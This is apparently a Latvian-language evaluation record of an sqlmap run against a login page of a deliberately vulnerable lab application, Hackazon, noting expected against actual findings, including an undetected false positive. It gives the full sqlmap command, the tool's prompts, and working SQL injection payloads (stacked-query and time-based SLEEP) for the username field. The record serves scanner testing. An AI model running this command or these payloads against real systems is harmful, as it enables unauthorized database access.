=================================================================================
1. Īpašība: pseidoreāla login lappuse
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: -
3.2. error-based: username=test'&password=test
3.3. time-based: username=test' or sleep(1)-- -&password=test
3.4. union: -
4. Reālais rezultāts: redzams zemāk (neatklāts false positive)
5. Vidējais risinājuma ilgums: 186577727 nanosekundes
6. Palaistā komanda
sqlmap -u "http://hackazon.lc/user/login" -p username,password --data="username=test&password=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4cu25hpjs5p...t0ebmvn7v3'). Do you want to use those [Y/n] y
7.2. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.3. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.4. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.5. POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.6. it is recommended to perform only basic UNION test if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
=================================================================================
sqlmap identified the following injection point(s) with a total of 5224 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind (FALSE POSITIVE)
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=test' AND 9372=(SELECT (CASE WHEN (9372=9372) THEN 9372 ELSE (SELECT 1433 UNION SELECT 4070) END))-- TPwj&password=test

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=test';SELECT SLEEP(5)#&password=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 9212 FROM (SELECT(SLEEP(5)))fgVb)-- adGi&password=test
---
web application technology: PHP 5.6.40, Apache 2.4.38, PHP
back-end DBMS: MySQL >= 5.0.12
